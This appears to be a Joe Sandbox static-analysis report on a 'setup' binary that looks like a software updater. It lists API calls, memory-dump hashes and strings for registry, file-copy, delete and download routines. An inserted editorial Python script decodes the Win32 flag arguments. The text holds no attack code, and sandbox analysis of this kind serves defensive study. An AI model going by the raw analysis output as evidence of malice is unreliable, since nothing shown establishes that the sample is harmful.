                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1924968399-0
                                                                                                                          • Opcode ID: 3936a7820b90e5d35e1c6d0616c4fe12d0a42bbf34d51a4bb444a3a231937d2e
                                                                                                                          • Instruction ID: 4c5fb2c35d19d17cf2281839f538a92107c5901211e89ac0a869cb8d302224a1
                                                                                                                          • Opcode Fuzzy Hash: 3936a7820b90e5d35e1c6d0616c4fe12d0a42bbf34d51a4bb444a3a231937d2e
                                                                                                                          • Instruction Fuzzy Hash: BB418E75A4022D9FDB20DF68EC88BA9B7B8FB14744F1005A9F519F7680DB719E80CB61
                                                                                                                          APIs
                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00C1294E
                                                                                                                            • Part of subcall function 00C12A5F: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00000001,?,00000000), ref: 00C12A8B
                                                                                                                            • Part of subcall function 00C12A5F: RegQueryValueW.ADVAPI32(?,00000000,?,?), ref: 00C12AB6
                                                                                                                            • Part of subcall function 00C12A5F: RegCloseKey.ADVAPI32(?), ref: 00C12AD1
                                                                                                                          • WinExec.KERNEL32(00000000,00000005), ref: 00C12A37
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseExecExecuteOpenQueryShellValue
                                                                                                                          • String ID: "%1"$.htm$\shell\open\command$open
                                                                                                                          • API String ID: 2057079084-1533145997
                                                                                                                          • Opcode ID: d9aa4119052fd40f68972901257da5ba84f2e10a8a86ca094c232644d78583e5
                                                                                                                          • Instruction ID: 83bfa196bbd0cecec1a7a3418cfb170fc1d5303866e652ba84e61b47a1dea5a6
                                                                                                                          • Opcode Fuzzy Hash: d9aa4119052fd40f68972901257da5ba84f2e10a8a86ca094c232644d78583e5
                                                                                                                          • Instruction Fuzzy Hash: B6310976500219AADB30E7749C86EEF33ACEF46710F100065F604E7092EA30DE85B671
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?,00000410,00000000), ref: 00C20432
                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,?,?,?,?,?), ref: 00C20464
                                                                                                                          • VerQueryValueW.VERSION(?,00CB038C,00000000,?,?,?,?), ref: 00C2048F
                                                                                                                            • Part of subcall function 00C20554: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,00000000), ref: 00C205A1
                                                                                                                            • Part of subcall function 00C20554: wsprintfW.USER32 ref: 00C205C7
                                                                                                                            • Part of subcall function 00C20554: VerQueryValueW.VERSION(?,?,?,?), ref: 00C205E7
                                                                                                                            • Part of subcall function 00C20554: lstrcpyW.KERNEL32(00C20519,?), ref: 00C205F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$FileInfoVersion$Sizelstrcpywsprintf
                                                                                                                          • String ID: CompanyName$FileDescription$ProductName
                                                                                                                          • API String ID: 3048008207-1224206804
                                                                                                                          • Opcode ID: 6e6ed49a39a624b9e395fa3e5beb12e10a7be01b68bb5133424dbeabad52cd31
                                                                                                                          • Instruction ID: 1a42cd3ba824f7b306042010f5861c910ecd3af8ed2846ec0c3d1b09995ad99e
                                                                                                                          • Opcode Fuzzy Hash: 6e6ed49a39a624b9e395fa3e5beb12e10a7be01b68bb5133424dbeabad52cd31
                                                                                                                          • Instruction Fuzzy Hash: B7416571A1020AEBC704DFA5DC45AEEB7B8FF08300F10012AE419E3651EB30EA54DFA5
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00C3B26E
                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,00000010,00000000,0002001F,?,00000228), ref: 00C3B314
                                                                                                                            • Part of subcall function 00C3B201: __EH_prolog3.LIBCMT ref: 00C3B208
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00C3B338
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C3B3ED
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumH_prolog3H_prolog3_catch_Open
                                                                                                                          • String ID: Software\Classes\
                                                                                                                          • API String ID: 854624316-1121929649
                                                                                                                          • Opcode ID: c665e41997da9af177dc7e564d484d757c42c07caede77851f286ad62071dfb9
                                                                                                                          • Instruction ID: 10d229177a3c96bef60669afc0cd6247b72324e6b00a390962ef725ffed914e1
                                                                                                                          • Opcode Fuzzy Hash: c665e41997da9af177dc7e564d484d757c42c07caede77851f286ad62071dfb9
                                                                                                                          • Instruction Fuzzy Hash: 5E41B572910219EBCF21EBA4DC88BEDB7B8AF44310F1041DAE515A72A1CF709F48DE21
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 00C319AC
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTouchInputInfo), ref: 00C319E1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseTouchInputHandle), ref: 00C31A09
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                          • String ID: CloseTouchInputHandle$GetTouchInputInfo$user32.dll
                                                                                                                          • API String ID: 667068680-1853737257
                                                                                                                          • Opcode ID: 0451515a3d8706aeb985f30e34465721b0663159932a1bd56cbb822b51048596
                                                                                                                          • Instruction ID: 111f2cc6939c2c5d2e00681ff0292dbed2c9bc763ede4b607e7040efe9bf826a
                                                                                                                          • Opcode Fuzzy Hash: 0451515a3d8706aeb985f30e34465721b0663159932a1bd56cbb822b51048596
                                                                                                                          • Instruction Fuzzy Hash: 65318130611316AFCB149F69FC49F6D7BF9EB48761B14842AF825D32E0DB709E409A50
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C71
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C91
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C9C
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00008000,00000000,00000000), ref: 00C23CD7
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00C23CF3
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C23D0F
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C23D14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$Create$ReadWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2500732950-0
                                                                                                                          • Opcode ID: f30aa08203e40a1d92f25c143d00a313c45e77b58284ccf3be7e18f14c0062db
                                                                                                                          • Instruction ID: d619c7d783c80ffd6587bb20fb87bdeddc5143eececfde3486405a3ec0881aca
                                                                                                                          • Opcode Fuzzy Hash: f30aa08203e40a1d92f25c143d00a313c45e77b58284ccf3be7e18f14c0062db
                                                                                                                          • Instruction Fuzzy Hash: B9218071A50224BEEB206B75AC49FBF7AACEF41B64F204115F910E21D0DB749F059A60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C17D9B
                                                                                                                          • _strlen.LIBCMT ref: 00C17DBE
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00000000,00000020,00C17114,?), ref: 00C17E07
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C17E28
                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00C17E5C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$DeleteH_prolog3__strlen
                                                                                                                          • String ID: Deleting file : "%s"
                                                                                                                          • API String ID: 3666591681-3547222051
                                                                                                                          • Opcode ID: e9da9c7fad6a6354c3ca2ee5f5412adf49a6941d83f950b7cea75eb9b07d8f3d
                                                                                                                          • Instruction ID: 7ea1641990aea2e21da3d0eecad10ea98c68d930a5cef9173656cbec9a40bb3b
                                                                                                                          • Opcode Fuzzy Hash: e9da9c7fad6a6354c3ca2ee5f5412adf49a6941d83f950b7cea75eb9b07d8f3d
                                                                                                                          • Instruction Fuzzy Hash: 4F31A072E04208DFCB00EBA5D845AEE77B8EF49360F144629F561B7191DB309F84EBA1
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00C3ABC0
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C3ABEC
                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C3AC18
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3AC2A
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3AC39
                                                                                                                            • Part of subcall function 00C1E9FF: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00C1EA0F
                                                                                                                            • Part of subcall function 00C1E9FF: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00C1EA1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                                                                                          • String ID: software
                                                                                                                          • API String ID: 550756860-2010147023
                                                                                                                          • Opcode ID: 12ee8bc130f88efb73ab0b938cb8bb371ad9bf59062b39c52095ceb8e74e0259
                                                                                                                          • Instruction ID: a5cfd74139982914ba1c44a96cccd7b0378a6a20c3a378eefdc8234e39bc2c32
                                                                                                                          • Opcode Fuzzy Hash: 12ee8bc130f88efb73ab0b938cb8bb371ad9bf59062b39c52095ceb8e74e0259
                                                                                                                          • Instruction Fuzzy Hash: 89213B72A10119FBEB159F90DC89EFFBB7EEB44704F10406AB901E2150D7359E90EBA6
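The argument lists in the records above are printed as raw hex, which hides what the calls do. In the file routine at 00C23C71/00C23C91 the first CreateFileW opens the source with GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING, the second opens the destination with GENERIC_WRITE, FILE_SHARE_READ and CREATE_ALWAYS, and the ReadFile/WriteFile pair then moves 0x8000-byte (32 KiB) rounds, i.e. a plain file copy. In the registry routine at 00C3ABC0 RegOpenKeyExW opens HKEY_CURRENT_USER\software with 0x2001F, which is KEY_READ | KEY_WRITE, and both RegCreateKeyExW calls ask for the same rights; the RegOpenKeyExW at 00C3B314 uses the same mask under Software\Classes\. The decoder below is an editorial example added to this report, not Joe Sandbox code and not from the sample; the Win32 constant values are taken from the Windows SDK headers, and its only assumption is the line layout shown above ("• Name.Module(args), ref: addr", optionally prefixed by "Part of subcall function ...:"). It generalises beyond these two records by naming composite registry rights, leftover bits and unknown handles. The sample input is copied from the records above.

```python
"""Decode the numeric arguments in Joe Sandbox API-call lines into Win32 names.

Editorial example added to this report; not Joe Sandbox code and not part of the
sample. Win32 constant values are from the Windows SDK headers; the line layout
("• Name.Module(arg,...), ref: 00C23C71", optional "Part of subcall function X:"
prefix) is assumed from the records in this report.
"""
import re
from typing import Dict, List, Optional, Tuple

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# Composite registry rights are matched first; any bits left over are named singly.
KEY_COMPOSITE = ((0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE"))
KEY_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
            0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
            0x20000: "READ_CONTROL"}

CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\)(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask as 'NAME | NAME'; bits not in the table stay as hex."""
    names, rest = [], value
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return " | ".join(names) if names else "0"


def decode_sam(value: int) -> str:
    """Registry samDesired: 0x2001F in the records above is KEY_READ | KEY_WRITE."""
    names, rest = [], value
    for mask, name in KEY_COMPOSITE:
        if rest and value & mask == mask:   # test the full value, clear from the remainder
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(decode_flags(rest, KEY_BITS))
    return " | ".join(names) if names else "0"


def hex_at(args: List[str], i: int) -> Optional[int]:
    """Argument i as an int, or None when it is '?' (unresolved) or a string."""
    if i < len(args) and re.fullmatch(r"[0-9A-Fa-f]+", args[i]):
        return int(args[i], 16)
    return None


def parse_call(line: str) -> Optional[dict]:
    m = CALL_RE.match(line)
    if not m:
        return None
    raw = m.group("args").strip()
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": m.group("ref")}


def decode_call(call: dict) -> Dict[str, str]:
    """Name the parameters that reveal intent. Joe Sandbox prints stack slots past the
    real parameter count (the second CreateFileW line above shows 14), so only the
    documented positions are read."""
    api, a = call["api"], call["args"]
    out: Dict[str, str] = {}

    def named(i: int, table: Dict[int, str]) -> str:
        v = hex_at(a, i)
        return "?" if v is None else table.get(v, f"0x{v:X}")

    def flags(i: int, table: Dict[int, str]) -> str:
        v = hex_at(a, i)
        return "?" if v is None else decode_flags(v, table)

    if api in ("CreateFileW", "CreateFileA"):
        out["lpFileName"] = a[0] if a else "?"
        out["dwDesiredAccess"] = flags(1, GENERIC_ACCESS)
        out["dwShareMode"] = flags(2, SHARE_MODE)
        out["dwCreationDisposition"] = named(4, DISPOSITION)
    elif api in ("ReadFile", "WriteFile"):
        v = hex_at(a, 2)
        key = "nNumberOfBytesToRead" if api == "ReadFile" else "nNumberOfBytesToWrite"
        out[key] = "?" if v is None else str(v)
    elif api in ("RegOpenKeyExW", "RegOpenKeyExA", "RegCreateKeyExW", "RegCreateKeyExA"):
        out["hKey"] = named(0, HKEY_ROOTS)
        out["lpSubKey"] = a[1] if len(a) > 1 else "?"
        v = hex_at(a, 3 if api.startswith("RegOpen") else 5)  # samDesired position differs
        out["samDesired"] = "?" if v is None else decode_sam(v)
    return out


def decode_lines(lines: List[str]) -> List[Tuple[Optional[str], str, Dict[str, str]]]:
    results = []
    for line in lines:
        call = parse_call(line)
        if call:
            fields = decode_call(call)
            if fields:
                results.append((call["ref"], call["api"], fields))
    return results


# Input: API lines copied from the file-copy and registry records above.
SAMPLE_LINES = [
    "• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C71",
    "• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C23C91",
    "• ReadFile.KERNEL32(00000000,00000000,00008000,00000000,00000000), ref: 00C23CD7",
    "• RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00C3ABC0",
    "• RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C3ABEC",
    "• RegOpenKeyExW.ADVAPI32(?,00000010,00000000,0002001F,?,00000228), ref: 00C3B314",
]

if __name__ == "__main__":
    for ref, api, fields in decode_lines(SAMPLE_LINES):
        print(f"{ref}: {api}(" + ", ".join(f"{k}={v}" for k, v in fields.items()) + ")")
```

Arguments shown as "?" are values Joe Sandbox could not resolve statically (handles and buffers filled at run time); the decoder keeps them as "?" rather than guessing. Adding further APIs is a matter of one more branch in decode_call with the parameter positions from the SDK documentation.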
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C8A2
                                                                                                                          • SetTimer.USER32(00000000,00000096,000000C8,00000000), ref: 00C1C945
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_Timer
                                                                                                                          • String ID: Downloading : %s$Downloading new version of %s...$Failed! Socket Error!! ( %d )$Socket Error!
                                                                                                                          • API String ID: 2312686240-3567217922
                                                                                                                          • Opcode ID: 977e792f65ed8652b9aa513b46502ba08f36e4ee7315a4576cb84819e4794d26
                                                                                                                          • Instruction ID: 0953f639bd4811019329de2406d285757c1fa0645bd53467600b21c7a27a8d4e
                                                                                                                          • Opcode Fuzzy Hash: 977e792f65ed8652b9aa513b46502ba08f36e4ee7315a4576cb84819e4794d26
                                                                                                                          • Instruction Fuzzy Hash: FA210871A80702AFD720AF708CC2EEF73A9BF05704F480629F465671C1D7716D54EA65
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C9A1
                                                                                                                          • SetTimer.USER32(00000000,00000096,000000C8,00000000), ref: 00C1CA44
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_Timer
                                                                                                                          • String ID: Downloading : %s$Downloading update for %s...$Failed! Socket Error!! ( %d )$Socket Error!
                                                                                                                          • API String ID: 2312686240-3870485862
                                                                                                                          • Opcode ID: 8fed968ef7ddb8814a3538a7d96676b2994cfdd5b48b8c25c7c3a920fa549fca
                                                                                                                          • Instruction ID: d9c97bdd2cd17303e26143fa7b77195332af0cdc4b0d0a25160f6e8fe67eb071
                                                                                                                          • Opcode Fuzzy Hash: 8fed968ef7ddb8814a3538a7d96676b2994cfdd5b48b8c25c7c3a920fa549fca
                                                                                                                          • Instruction Fuzzy Hash: C02102B16C0705AFD720EB708CC2EEBB6A9BF05710F480628F065671C1DB716E94BA61
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1B138
                                                                                                                          • CreateMutexW.KERNEL32(00000000,00000001,?,0000006E,00000014,00C1C354,00000001,00000084,00C1C6EF), ref: 00C1B16D
                                                                                                                          • GetLastError.KERNEL32 ref: 00C1B176
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C1B187
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1B1F8
                                                                                                                          Strings
                                                                                                                          • '%s' is running. It can't be running when it is about to be updated.Close %s and press retry to try again.Or press continue t, xrefs: 00C1B1B5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateErrorH_prolog3HandleLastMutexSleep
                                                                                                                          • String ID: '%s' is running. It can't be running when it is about to be updated.Close %s and press retry to try again.Or press continue t
                                                                                                                          • API String ID: 4081624877-2588004037
